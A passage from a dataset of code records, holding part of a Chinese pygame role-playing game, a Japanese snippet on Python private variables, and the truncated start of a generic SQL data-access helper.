exp\n self.need_exp = need_exp\n self.position = position\n self.grow_attack = grow_attack\n self.grow_defence = grow_defence\n self.grow_health = grow_health\n self.grow_magic = grow_magic\n self.grow_critical = grow_critical\n self.grow_speed = grow_speed\n self.grow_luck = grow_luck\n self.grow_insight = grow_insight\n self.attack = attack\n self.defence = defence\n self.health = health\n self.magic = magic\n self.critical = critical\n self.speed = speed\n self.luck = luck\n self.insight = insight\n\n def up_level(self, exp):\n self.exp += exp\n while self.exp >= self.need_exp:\n self.level += 1\n self.exp = self.exp - self.need_exp\n self.need_exp *= 2\n self.attack += self.grow_attack\n self.defence += self.grow_defence\n self.health += self.grow_health\n self.magic += self.grow_magic\n self.critical += self.grow_critical\n self.speed += self.grow_speed\n self.luck += self.grow_luck\n self.insight += self.grow_insight\n\n def character_cur_ability(self):\n \"\"\"set cur_ability\"\"\"\n self.cur_attack = self.attack\n self.cur_defence = self.defence\n self.cur_health = self.health\n self.cur_speed = self.speed\n self.cur_magic = self.magic\n self.cur_critical = self.critical\n\n\ndef load_file():\n \"\"\"存档读取\"\"\"\n if not os.path.exists('fileSave.json'):\n with open('fileSave.json', 'a') as f:\n characters = []\n drug = []\n props = []\n materials = []\n dic = {'plot': 0, 'money': 0, 'characters': characters, 'drug': drug, 'props': props, 'materials': materials}\n dic = json.dumps(dic, indent=4, ensure_ascii=False)\n f.write(dic)\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n return contents\n\n\ndef down_file(contents):\n \"\"\"保存存档\"\"\"\n contents = json.dumps(contents, indent=4, ensure_ascii=False)\n with open('fileSave.json', 'w', encoding='utf-8') as file_object:\n \"\"\"覆盖原存档\"\"\"\n file_object.write(contents)\n\n\ndef make_lists(contents, props_list, drug_list, characters_list, materials_list):\n \"\"\"存档变列表\"\"\"\n for j in contents['characters']:\n ch = Character(j['name'])\n ch_prop = []\n for i in j['position']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'],\n i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n ch_prop.append(prop)\n ch.create_new_character(j['attack'], j['defence'], j['health'], j['magic'], j['critical'], j['speed'],\n j['luck'], j['insight'], j['grow_attack'], j['grow_defence'], j['grow_health'],\n j['grow_magic'], j['grow_critical'], j['grow_speed'], j['grow_luck'], j['grow_insight'],\n j['level'], j['exp'], j['need_exp'], ch_prop)\n characters_list.append(ch)\n for i in contents['props']:\n prop = Prop(i['name'])\n prop.create_new_prop(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'], i['luck'],\n i['grow_attack'], i['grow_defence'], i['grow_health'], i['grow_magic'], i['grow_critical'],\n i['grow_speed'], i['grow_luck'], i['value'], i['pos'], i['level'], i['exp'],\n i['need_exp'], i['enchant_time'], i['is_wear'], i['numb'])\n props_list.append(prop)\n for i in contents['drug']:\n drug = Drug(i['name'])\n drug.create_new_drug(i['attack'], i['defence'], i['health'], i['speed'], i['magic'], i['num'], i['value'])\n drug_list.append(drug)\n for i in contents['materials']:\n material = Material(i['name'])\n material.create_new_material(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], i['num'], i['value'], i['type'])\n materials_list.append(material)\n\n\ndef show_lines(lines, t):\n for i in range(len(lines)):\n texts = font.render(lines[i], True, BLACK)\n text = texts.get_rect()\n text.center = (width/2, 100 + i*200)\n screen.blit(texts, text)\n pygame.display.update() # watch out its position\n time.sleep(t)\n\n\ndef show_words(words, coord, font, color):\n texts = font.render(words, True, color)\n text = texts.get_rect()\n text.center = (coord[0], coord[1])\n screen.blit(texts, text)\n\n\ndef show_attr(character, coord):\n show_words('经验:' + str(character.exp) + '/' + str(character.need_exp), (coord[0] + 72, coord[1]), font, BLACK)\n show_words('攻击:' + str(character.attack), (coord[0], coord[1] + 50), font, BLACK)\n show_words('防御:' + str(character.defence), (coord[0] + 145, coord[1] + 50), font, BLACK)\n show_words('生命:' + str(character.health), (coord[0], coord[1] + 100), font, BLACK)\n show_words('魔法:' + str(character.magic), (coord[0] + 145, coord[1] + 100), font, BLACK)\n show_words('暴击:' + str(character.critical), (coord[0], coord[1] + 150), font, BLACK)\n show_words('速度:' + str(character.speed), (coord[0] + 145, coord[1] + 150), font, BLACK)\n show_words('幸运:' + str(character.luck), (coord[0], coord[1] + 200), font, BLACK)\n show_words('洞视:' + str(character.insight), (coord[0] + 145, coord[1] + 200), font, BLACK)\n show_words('等级:' + str(character.level), (coord[0], coord[1] + 250), font, BLACK)\n\n\ndef refresh_lists(baggage, props_list, drug_list, materials_list):\n \"\"\"背包存入列表\"\"\"\n props_list.clear()\n drug_list.clear()\n materials_list.clear()\n for i in baggage.objects:\n if Prop == type(i):\n props_list.append(i)\n elif Drug == type(i):\n drug_list.append(i)\n elif Material == type(i):\n materials_list.append(i)\n\n\ndef refresh_content(contents, characters_list, props_list, drug_list, materials_list):\n \"\"\"列表变存档\"\"\"\n contents['characters'].clear()\n contents['drug'].clear()\n contents['props'].clear()\n contents['materials'].clear()\n for i in characters_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck,\n 'insight': i.insight, 'level': i.level, 'exp': i.exp, 'need_exp': i.need_exp,\n 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence, 'grow_health': i.grow_health,\n 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical, 'grow_speed': i.grow_speed,\n 'grow_luck': i.grow_luck, 'grow_insight': i.grow_insight, 'position': i.position}\n prop_dic = []\n for j in dic['position']:\n prop = {'name': j.name, 'attack': j.attack, 'defence': j.defence, 'health': j.health, 'magic': j.magic,\n 'critical': j.critical, 'speed': j.speed, 'luck': j.luck, 'level': j.level,'exp': j.exp,\n 'need_exp': j.need_exp, 'grow_attack': j.grow_attack, 'grow_defence': j.grow_defence,\n 'grow_health': j.grow_health, 'grow_magic': j.grow_magic, 'grow_critical': j.grow_critical,\n 'grow_speed': j.grow_speed, 'grow_luck': j.grow_luck, 'pos': j.pos, 'value': j.value,\n 'is_wear': j.is_wear, 'enchant_time': j.enchant_time, 'numb': j.numb}\n prop_dic.append(prop)\n dic['position'] = prop_dic\n content['characters'].append(dic)\n for i in drug_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num}\n content['drug'].append(dic)\n for i in props_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health,\n 'magic': i.magic, 'critical': i.critical, 'speed': i.speed, 'luck': i.luck, 'level': i.level,\n 'exp': i.exp, 'need_exp': i.need_exp, 'grow_attack': i.grow_attack, 'grow_defence': i.grow_defence,\n 'grow_health': i.grow_health, 'grow_magic': i.grow_magic, 'grow_critical': i.grow_critical,\n 'grow_speed': i.grow_speed, 'grow_luck': i.grow_luck, 'pos': i.pos, 'value': i.value,\n 'is_wear': i.is_wear, 'enchant_time': i.enchant_time, 'numb': i.numb}\n content['props'].append(dic)\n for i in materials_list:\n dic = {'name': i.name, 'attack': i.attack, 'defence': i.defence, 'health': i.health, 'critical': i.critical,\n 'magic': i.magic, 'speed': i.speed, 'value': i.value, 'num': i.num, 'luck': i.luck, 'type': i.type}\n content['materials'].append(dic)\n\n\ndef add_prop_character(character, prop, num):\n \"\"\"人物装备道具\"\"\"\n character.attack += prop.attack\n character.defence += prop.defence\n character.health += prop.health\n character.magic += prop.magic\n character.critical += prop.critical\n character.luck += prop.luck\n character.speed += prop.speed\n for i in character.position:\n if prop.pos <= 1:\n if i.pos <= 1:\n remove_prop_character(character, i)\n break\n else:\n if i.pos == prop.pos:\n remove_prop_character(character, i)\n break\n if prop.is_wear != 0:\n remove_prop_character(character_list[prop.is_wear-1], prop)\n character.position.append(prop)\n prop.is_wear = num\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = prop.is_wear\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef remove_prop_character(character, prop):\n \"\"\"移除装备\"\"\"\n for i in character.position:\n if i.name == prop.name:\n character.position.remove(i)\n prop.is_wear = 0\n for i in character_list:\n if i.name == character.name:\n i.position = character.position\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.is_wear = 0\n character.attack -= prop.attack\n character.defence -= prop.defence\n character.health -= prop.health\n character.magic -= prop.magic\n character.critical -= prop.critical\n character.luck -= prop.luck\n character.speed -= prop.speed\n\n\ndef strengthen_prop(prop):\n \"\"\"强化装备\"\"\"\n level = prop.level\n chance = 100 - ((level - 1) * 10)\n if level == 10:\n return 2 # 2 for out of range\n if content['money'] < baggage.objects[chose_num].need_exp:\n return 3 # 3 for lack of money\n content['money'] -= baggage.objects[chose_num].need_exp\n rand = random.randint(1, 100)\n if rand <= chance:\n prop.up_level(prop.need_exp)\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n i.level = prop.level\n i.need_exp = prop.need_exp\n i.exp = prop.exp\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n return 1 # 1 for success\n else:\n return 0 # 0 for fail\n\n\ndef enchant_prop(prop, material):\n for i in prop_list:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time -= 1\n i.attack += material.attack\n i.defence += material.defence\n i.health += material.health\n i.magic += material.magic\n i.critical += material.critical\n i.speed += material.speed\n i.luck += material.luck\n i.value += material.value // 2\n if prop.is_wear != 0:\n for i in character_list[prop.is_wear - 1].position:\n if i.name == prop.name and i.numb == prop.numb:\n i.enchant_time = prop.enchant_time\n i.attack = prop.attack\n i.defence = prop.defence\n i.health = prop.health\n i.magic = prop.magic\n i.critical = prop.critical\n i.speed = prop.speed\n i.luck = prop.luck\n i.value = prop.value\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n\n\ndef is_new(contents):\n new = contents[\"plot\"]\n plot_1 = [\"一觉醒来,你不知道自己身处何处,\", \"甚至自己是何许人也亦无从得知,世界犹如混沌般恍惚。\", \"徘徊于这谜一般的大陆上,你决定只身探索,寻找真相......\"]\n if new == 0:\n contents[\"plot\"] = 1\n \"\"\"测试为0,实际为1\"\"\"\n screen.fill(CREAM)\n show_lines(plot_1, 2)\n pygame.display.update()\n fclock.tick(fps)\n down_file(contents)\n\n\ndef draw_window():\n pygame.draw.rect(screen, BLACK, (100, 50, width - 200, height - 200), 4)\n \"\"\"rect stand for (x,y,width,height)\"\"\"\n pygame.draw.rect(screen, BLACK, (width - 130, 50, 30, 30), 4)\n pygame.draw.line(screen, RED, (width - 125, 55), (width - 105, 75), 4)\n pygame.draw.line(screen, RED, (width - 105, 55), (width - 125, 75), 4)\n pygame.display.update()\n fclock.tick(fps)\n\n\ndef close_window():\n mouse_pos = pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n for event in pygame.event.get(): # magic move\n if event.type == pygame.QUIT: # close the window\n content['baggage'] = baggage.amount # put into fileSave\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n down_file(content)\n sys.exit()\n if width - 130 < mouse_pos[0] < width - 100 and 50 < mouse_pos[1] < 80 and mouse_pressed[0] == 1:\n return 1\n\n\ndef show_image(item_list_image, coord, id, num):\n dic = {'-1': wand_images, '0': bow_images, '1': sword_images, '2': helmet_images, '3': armor_images,\n '4': shoe_images, '5': ring_images, '6': title_images, '大红药': big_health_images,\n '小红药': small_health_images, '大蓝药': big_magic_images, '小蓝药': small_magic_images,\n '小攻击药': small_attack_images, '大攻击药': big_attack_images, '附魔材料': enchant_material_images,\n '职业材料': vocational_material_images, '任务材料': mission_material_images}\n item_list_image.append(dic[id].get_rect())\n item_list_image[num] = item_list_image[num].move(coord)\n screen.blit(dic[id], item_list_image[num])\n return item_list_image\n\n\ndef show_object(baggage):\n item_list_image = []\n j = 0\n for i in baggage.objects:\n coord = j % 6 * 150 + 150, j // 6 * 150 + 70\n if type(i) == Prop:\n item_list_image = show_image(item_list_image, coord, str(i.pos), j)\n if i.is_wear > 0:\n pygame.draw.line(screen, RED, (j % 6 * 150 + 115, j // 6 * 150 + 65), (j % 6 * 150 + 125, j // 6 * 150\n + 75), 4)\n pygame.draw.line(screen, RED, (j % 6 * 150 + 125, j // 6 * 150 + 75), (j % 6 * 150 + 145, j // 6 * 150\n + 55), 4)\n show_words(str(character_list[i.is_wear - 1].name),\n (j % 6 * 150 + 190, j // 6 * 150 + 60), font_small, GREY)\n elif type(i) == Drug:\n item_list_image = show_image(item_list_image, coord, str(i.name), j)\n elif type(i) == Material:\n '''change into upper form'''\n item_list_image = show_image(item_list_image, coord, str(i.type), j)\n show_words(i.name, (j % 6 * 150 + 180, j // 6 * 150 + 150), font, BLACK)\n j += 1\n return len(item_list_image)\n\n\ndef click_on_props():\n mouse_pos = pygame.mouse.get_pos()\n for i in range(4):\n if 100 < mouse_pos[0] < width - 100 and 50 + i * 150 < mouse_pos[1] < 200 + i * 150:\n for j in range(6):\n if 100 + j * 150 < mouse_pos[0] < 250 + j * 150:\n return i * 6 + j\n return -1\n\n\ndef translate(word):\n translator = {'name': '名称', 'attack': '攻击', 'defence': '防御', 'health': '生命', 'magic': '魔法', 'critical': '暴击',\n 'speed': '速度', 'luck': '幸运', 'level': '等级', 'num': '数量', 'enchant_time': '可附魔次数',\n 'value': '价格', 'type': '类型'}\n return translator[word]\n\n\ndef sale_obj(baggage, obj, contents):\n \"\"\"卖出物品\"\"\"\n contents['money'] += obj.value\n if Prop == type(obj):\n baggage.objects.remove(obj)\n else:\n for i in baggage.objects:\n if i.name == obj.name:\n i.num -= 1\n if i.num <= 0:\n baggage.objects.remove(i)\n baggage.amount -= 1\n break\n\n\ndef draw_character():\n pygame.draw.line(screen, GREY, (100, height / 2 - 50), (width - 100, height / 2 - 50), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50), ((width - 200) / 3 + 100, height - 150), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 105, 50), ((width - 200) / 1.5 + 105, height - 150), 4)\n show_words(character_list[0].name, ((width - 200) / 6 + 100, 100), font, BLACK)\n show_words(character_list[1].name, ((width - 200) / 2 + 100, 100), font, BLACK)\n show_words(character_list[2].name, ((width - 200) / 6 * 5 + 100, 100), font, BLACK)\n show_attr(character_list[0], ((width - 200) / 6 + 20, height / 2 - 20))\n show_attr(character_list[1], ((width - 200) / 2 + 20, height / 2 - 20))\n show_attr(character_list[2], ((width - 200) / 6 * 5 + 20, height / 2 - 20))\n for i in range(6):\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 - 40 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n pygame.draw.rect(screen, GREY, (((width - 200) / 2 - 35 + 97 * (i % 3), 240 if i > 2 else 130), (85, 85)), 4)\n pygame.draw.rect(screen, GREY, (((width - 200) / 6 * 5 - 35 + 97 * (i % 3),\n 240 if i > 2 else 130), (85, 85)), 4)\n item_list_image = []\n k = 0\n for i in range(3):\n for j in range(6):\n if j < len(character_list[i].position):\n coord = (width - 200) / 6 - 25 + 97 * (j % 3) + 308 * i - (i // 2) * 8, 250 if j > 2 else 140\n item_list_image = show_image(item_list_image, coord, str(character_list[i].position[j].pos), k)\n show_words(str(character_list[i].position[j].name),\n ((width - 200) / 6 + 97 * (j % 3) + i * 300, 340 if j > 2 else 230),\n font_small, RED)\n k += 1\n draw_window()\n\n\ndef draw_map():\n for point in point_list:\n pygame.draw.circle(screen, YELLOW, point, 15, 4)\n\n\ndef level_choose():\n i = 0\n for point in point_list:\n if point[0] - 25 < map_choice[0] < point[0] + 25 and point[1] - 25 < map_choice[1] < point[1] + 25:\n pygame.draw.circle(screen, RED, point, 15, 4)\n return i\n i += 1\n return -1\n\n\ndef refresh_baggage(baggage, props_list, drug_list, materials_list):\n \"\"\"列表载入背包\"\"\"\n baggage.objects = props_list[:] + drug_list[:] + materials_list[:]\n baggage.amount = len(baggage.objects)\n\n\ndef get_cur_ability(fight_event):\n \"\"\"初始化出战人物\"\"\"\n with open('fileSave.json', 'r', encoding='utf-8') as file_object:\n contents = json.load(file_object)\n for j in contents['fight_event']:\n if j['num'] is fight_event:\n for i in j['enemy']:\n ch = Character(i['name'])\n ch.create_new_character(i['attack'], i['defence'], i['health'], i['magic'], i['critical'], i['speed'],\n i['luck'], 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, [])\n enemy_list.append(ch)\n for i in characters_fight_list:\n i.character_cur_ability()\n for i in enemy_list:\n i.character_cur_ability()\n\n\ndef judge_speed():\n \"\"\"速度排序\"\"\"\n speed_list = []\n for i in characters_fight_list:\n if i.cur_health > 0:\n speed_list.append(i)\n for i in enemy_list:\n if i.cur_health > 0:\n speed_list.append(i)\n for i in range(0, len(speed_list)-1):\n for j in range(i+1, len(speed_list)):\n if speed_list[i].cur_speed < speed_list[j].cur_speed:\n speed_list[i], speed_list[j] = speed_list[j], speed_list[i]\n return speed_list\n\n\ndef character_action(character1, character2):\n harm = round(0.8 * character1.cur_attack - character2.cur_defence) + round(0.2 * character1.cur_attack)\\\n if character1.cur_attack > character2.cur_defence else round(0.2 * character1.cur_attack)\n if character1.cur_critical >= random.randint(1, 100):\n print(\"暴击!!!\")\n harm = round(character1.cur_attack * 1.5) - character2.cur_defence\n if harm <= 0:\n harm = 0\n character2.cur_health -= harm\n print(character1.name + '对' + character2.name + '造成了' + str(harm) + '点伤害。')\n\n\ndef character_die(character, list):\n list.remove(character)\n\n\ndef fight_end():\n if len(characters_fight_list) is 0 or len(enemy_list) is 0:\n return True\n return False\n\n\ndef fight_fight():\n \"\"\"虚拟战斗\n 战斗主函数\"\"\"\n while fight_end() is False:\n \"\"\"判断战斗是否结束\"\"\"\n speed_list = judge_speed()\n \"\"\"刷新行动列表\"\"\"\n for i in speed_list:\n if i.cur_health > 0 and fight_end() is False:\n if i in characters_fight_list:\n if len(enemy_list) > 1:\n character = enemy_list[random.randint(0, len(enemy_list))]\n else:\n character = enemy_list[-1]\n character_action(i, character)\n \"\"\"目前只有战斗功能\"\"\"\n print(character.name + 'health' + str(character.cur_health))\n if character.cur_health <= 0:\n character_die(character, enemy_list)\n speed_list.remove(character)\n else:\n if len(characters_fight_list) > 1:\n character = characters_fight_list[random.randint(0, len(enemy_list))]\n else:\n character = characters_fight_list[-1]\n character_action(i, character)\n print(character.name + 'health' + str(character.cur_health))\n if character.cur_health <= 0:\n character_die(character, characters_fight_list)\n speed_list.remove(character)\n\n\ncontent = load_file()\nbaggage = Baggage(content['baggage'])\nis_new(content)\ncharacter_list = []\ndrug_list = []\nmaterial_list = []\nprop_list = []\nmake_lists(content, prop_list, drug_list, character_list, material_list)\nrefresh_baggage(baggage, prop_list, drug_list, material_list)\nmap_choice = [20, height - 20]\nmap_x_velocity = 0\nmap_y_velocity = 0\nflag = 0\npoint_list = [(100, 200), [200, 100], [300, 400], [500, 400]]\nlevel_choice = -1\n\nwhile True:\n screen.fill(CREAM)\n for event in pygame.event.get(): # event list\n if event.type == pygame.QUIT: # close the window\n refresh_content(content, character_list, prop_list, drug_list, material_list)\n down_file(content)\n sys.exit()\n elif event.type == pygame.KEYDOWN: # event of press the key\n if event.key == pygame.K_RIGHT:\n map_x_velocity = 2\n if event.key == pygame.K_DOWN:\n map_y_velocity = 2\n if event.key == pygame.K_LEFT:\n map_x_velocity = -2\n if event.key == pygame.K_UP:\n map_y_velocity = -2\n elif event.type == pygame.KEYUP: # event of release the key\n if event.key == pygame.K_RIGHT:\n map_x_velocity = 0\n if event.key == pygame.K_DOWN:\n map_y_velocity = 0\n if event.key == pygame.K_LEFT:\n map_x_velocity = 0\n if event.key == pygame.K_UP:\n map_y_velocity = 0\n if event.key == pygame.K_SPACE and level_choice is not -1:\n print(int(level_choice))\n characters_fight_list = character_list[:]\n enemy_list = []\n get_cur_ability(level_choice)\n fight_fight()\n print(int(level_choice))\n mouse_pos = pygame.mouse.get_pos()\n mouse_pressed = pygame.mouse.get_pressed()\n '''return tuple object, which [0] represent left key, [1] for middle, [2] for right'''\n if width - 60 < mouse_pos[0] < width and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n '''character'''\n draw_character()\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (width - 120 < mouse_pos[0] < width - 60 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1)\\\n or flag == 1:\n \"\"\"bag\"\"\"\n show_words(\"金钱:\" + str(content['money']), (width / 2, 30), font, BLACK)\n for i in range(3):\n pygame.draw.line(screen, BLACK, (100, 200 + i * 150), (width - 100, 200 + i * 150), 4)\n for i in range(5):\n pygame.draw.line(screen, BLACK, (250 + i * 150, 50), (250 + i * 150, height - 150), 4)\n ''' put into function'''\n props_num = show_object(baggage)\n draw_window()\n flag = 0\n while True:\n if close_window() == 1:\n refresh_lists(baggage, prop_list, drug_list, material_list)\n break\n mouse_pressed = pygame.mouse.get_pressed()\n cur_word_1 = ''\n cur_word_2 = ''\n tag = 0\n if mouse_pressed[0] == 1:\n chose_num = click_on_props()\n if 0 <= chose_num < props_num:\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n word_len = 0\n obj = vars(baggage.objects[chose_num])\n for i in obj:\n if not re.findall('(^grow|^need|pos|exp|is_wear|numb)', str(i)):\n if obj[i] != 0:\n if word_len < 6:\n cur_word_1 += translate(str(i)) + ':' + str(obj[i]) + ' '\n word_len += 1\n else:\n cur_word_2 += translate(str(i)) + ':' + str(obj[i]) + ' '\n show_words(cur_word_1, (width / 2, height - 120), font, BLACK)\n show_words(cur_word_2, (width / 2, height - 70), font, BLACK)\n elif mouse_pressed[2] == 1:\n chose_num = click_on_props()\n if 0 <= chose_num < props_num:\n chose_num = click_on_props()\n if type(baggage.objects[chose_num]) == Material or type(baggage.objects[chose_num]) == Drug:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n time.sleep(0.2)\n flag = 1\n break\n else:\n screen.fill(CREAM)\n pygame.draw.line(screen, BLACK, (100, 450), (width - 100, 450), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 3 + 100, 50),\n ((width - 200) / 3 + 100, 650), 4)\n pygame.draw.line(screen, BLACK, ((width - 200) / 1.5 + 100, 50),\n ((width - 200) / 1.5 + 100, 650), 4)\n show_words(\"售出\", ((width - 200) / 3 - 50, 350), font, BLACK)\n screen.blit(sale_images, sale_image)\n show_words(\"强化\", (width / 2, 350), font, BLACK)\n screen.blit(strengthen_images, strengthen_image)\n show_words(\"附魔\", ((width - 200) / 1.5 + 250, 350), font, BLACK)\n screen.blit(enchant_images, enchant_image)\n show_words(\"装备于\" + str(character_list[0].name), ((width - 200) / 3 - 50, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[1].name), (width / 2, 550), font, BLACK)\n show_words(\"装备于\" + str(character_list[2].name), ((width - 200) / 1.5 + 250, 550), font, BLACK)\n draw_window()\n while True:\n mouse_pressed = pygame.mouse.get_pressed()\n if mouse_pressed[0] == 1:\n mouse_pos = pygame.mouse.get_pos()\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 50 < mouse_pos[1] < 450:\n sale_obj(baggage, baggage.objects[chose_num], content)\n refresh_lists(baggage, prop_list, drug_list, material_list)\n refresh_baggage(baggage, prop_list, drug_list, material_list)\n tag = 1\n break\n if (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 50 <\\\n mouse_pos[1] < 450:\n streng_status = strengthen_prop(baggage.objects[chose_num])\n pygame.draw.rect(screen, CREAM, ((0, height - 145), (1100, 145)))\n if streng_status == 1:\n show_words('强化成功!', (width / 2, height - 100), font, RED)\n elif streng_status == 0:\n show_words('强化失败...', (width / 2, height - 100), font, RED)\n elif streng_status == 2:\n show_words('你的装备已经满级了!', (width / 2, height - 100), font, RED)\n elif streng_status == 3:\n show_words('没钱强化个毛啊!需要' + str(baggage.objects[chose_num].need_exp),\n (width / 2, height - 100), font, RED)\n pygame.display.update()\n fclock.tick(fps)\n time.sleep(0.2)\n if 100 < mouse_pos[0] < (width - 200) / 3 + 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[0], baggage.objects[chose_num], 1)\n tag = 1\n break\n elif (width - 200) / 3 + 100 < mouse_pos[0] < (width - 200) / 1.5 + 100 and 450 \\\n < mouse_pos[1] < 650:\n add_prop_character(character_list[1], baggage.objects[chose_num], 2)\n tag = 1\n break\n elif (width - 200) / 1.5 + 100 < mouse_pos[0] < width - 100 and 450 < mouse_pos[1] < 650:\n add_prop_character(character_list[2], baggage.objects[chose_num], 3)\n tag = 1\n break\n if close_window() == 1:\n break\n if tag == 1:\n flag = 1\n break\n pygame.display.update()\n fclock.tick(fps)\n if width - 180 < mouse_pos[0] < width - 120 and height - 60 < mouse_pos[1] < height and mouse_pressed[0] == 1:\n \"\"\"achievement\"\"\"\n draw_window()\n while True:\n if close_window() == 1:\n break\n if (map_x_velocity > 0 and map_choice[0] < width - 10) or (map_x_velocity < 0 and map_choice[0] > 10):\n map_choice[0] += map_x_velocity\n if (map_y_velocity > 0 and map_choice[1] < height - 10) or (map_y_velocity < 0 and map_choice[1] > 10):\n map_choice[1] += map_y_velocity\n pygame.draw.circle(screen, BLACK, tuple(map_choice), 10)\n screen.blit(character_images, character_image)\n screen.blit(bag_images, bag_image)\n screen.blit(achievement_images, achievement_image)\n draw_map()\n level_choice = level_choose()\n pygame.display.update()\n fclock.tick(fps)\n","repo_name":"DAZHAdazha/No-names-land","sub_path":"无名之地.py","file_name":"无名之地.py","file_ext":"py","file_size_in_byte":40390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2076863614","text":"#プライベート変数\n\nclass Human:\n\n #プライベート変数\n __human = 'human'\n\n def __init__(self,name,age):\n self.__name = name\n self.__age = age\n\n def print_msg(self):\n print('name = {},age = {},__human = {}'.format(self.__name,self.__age,self.__human))\n\nhuman = Human('taro',20)\n#無理やりプライベート変数にアクセスする方法\nprint(human._Human__name)\n\nprint(human.print_msg())\n","repo_name":"takicoYuki/pythonDesignPattern","sub_path":"myproject/class/base10.py","file_name":"base10.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"74574242011","text":"import inspect\n\n\ndef orm(cursor, dto_type):\n # the following line retrieve the argument names of the constructor\n args = inspect.getargspec(dto_type.__init__).args\n\n # the first argument of the constructor will be 'self', it does not correspond\n # to any database field, so we can ignore it.\n args = args[1:]\n\n # gets the names of the columns returned in the cursor\n col_names = [column[0] for column in cursor.description]\n\n # map them into the position of the corresponding constructor argument\n col_mapping = [col_names.index(arg) for arg in args]\n return [row_map(row, col_mapping, dto_type) for row in cursor.fetchall()]\n\n\ndef row_map(row, col_mapping, dto_type):\n ctor_args = [row[idx] for idx in col_mapping]\n return dto_type(*ctor_args)\n\n\n# we can use our method above in order to start writing a generic Dao\n# note that this class is not complete and we will add methods to it next\nclass Dao(object):\n def __init__(self, dto_type, conn):\n self._conn = conn\n self._dto_type = dto_type\n\n # dto_type is a class, its __name__ field contains a string representing the name of the class.\n self._table_name = dto_type.__name__.lower() + 's'\n\n def insert(self, dto_instance):\n ins_dict = vars(dto_instance)\n column_names = ','.join(ins_dict.keys())\n params = ins_dict.values()\n qmarks = ','.join(['?'] * len(ins_dict))\n stmt = 'INSERT INTO {} ({}) VALUES ({})' \\\n .format(self._table_name, column_names, qmarks)\n self._conn.execute(stmt, tuple(params))\n\n def update(self, dto_instance):\n ins_dict = vars(dto_instance)\n # for key, value in ins_dict.items():\n # value.replace(\":\", '=')\n # shitty code\n if ins_dict.get('id') is not None:\n pk = 'id'\n pkVal = '{}'.format(ins_dict.get(pk))\n else:\n pk = 'grade'\n pkVal = '\\'{}\\''.format(ins_dict.get(pk))\n\n column_names = '=?,'.join(ins_dict.keys())\n column_names += '=?'\n params = ins_dict.values()\n # qmarks = ','.join(['?'] * len(ins_dict))\n stmt = 'UPDATE {} SET {} WHERE {} = {}' \\\n .format(self._table_name, column_names, pk, pkVal)\n self._conn.execute(stmt, tuple(params))\n\n # delete\n def delete(self, keyvals):\n column_names = keyvals.keys()\n params = keyvals.values()\n stmt = 'DELETE FROM {} WHERE {}' \\\n .format(self._table_name, ' AND '.join([col + '=?' for col in column_names]))\n self._conn.execute(stmt, tuple(params))\n\n # find all\n def find_all(self):\n c = self._conn.cursor()\n c.execute('SELECT * FROM {}'.format(self._table_name))\n return orm(c, self._dto_type)\n\n # find by specific attributes\n def find(self, **keyvals):\n column_names = keyvals.keys()\n params = keyvals.values()\n\n stmt = 'SELECT * FROM {} WHERE {}' \\\n .format(self._table_name, ' AND '.join([col + '=?' for col in 